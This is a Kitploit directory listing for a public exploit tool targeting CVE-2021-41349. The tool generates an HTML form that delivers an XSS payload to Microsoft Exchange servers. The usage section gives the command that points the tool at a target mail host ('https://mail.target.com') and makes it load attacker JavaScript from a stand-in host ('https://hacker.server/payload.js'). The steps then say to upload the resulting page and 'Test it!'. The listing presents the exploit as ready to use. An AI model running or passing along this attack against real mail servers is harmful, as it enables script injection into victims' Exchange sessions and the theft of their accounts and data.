Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-41349 — Exploit tool for CVE-2021-41349 that generates an HTML form to deliver XSS payloads to Microsoft Exchange servers, enabling execution of arbitrary JavaScript. | Kitploit
Tools/GitHubGitHub/exploit-io/cve-2021-41349
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationWeb Security
GitHubexploit-io/cve-2021-41349

CVE-2021-41349

Exploit tool for CVE-2021-41349 that generates an HTML form to deliver XSS payloads to Microsoft Exchange servers, enabling execution of arbitrary JavaScript.

View Repository
1154 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Microsoft Exchange Exploit CVE-2021-41349

Exploiting: CVE-2021-41349 This exploiting tool creates a Form for posting XSS Payload to the target Exchange server. You need to create a js containing your desire to do.

Usage

  1. Create Your js Payload and upload it somewhare.
  2. run the CVE-2021-41349.py same as following steps.
root@kitploit:~
python3 CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html

or:

root@kitploit:~
./CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
  1. Upload The html file into server.
  2. Done! Test it!

Credits

  • @exploitio
Download Tool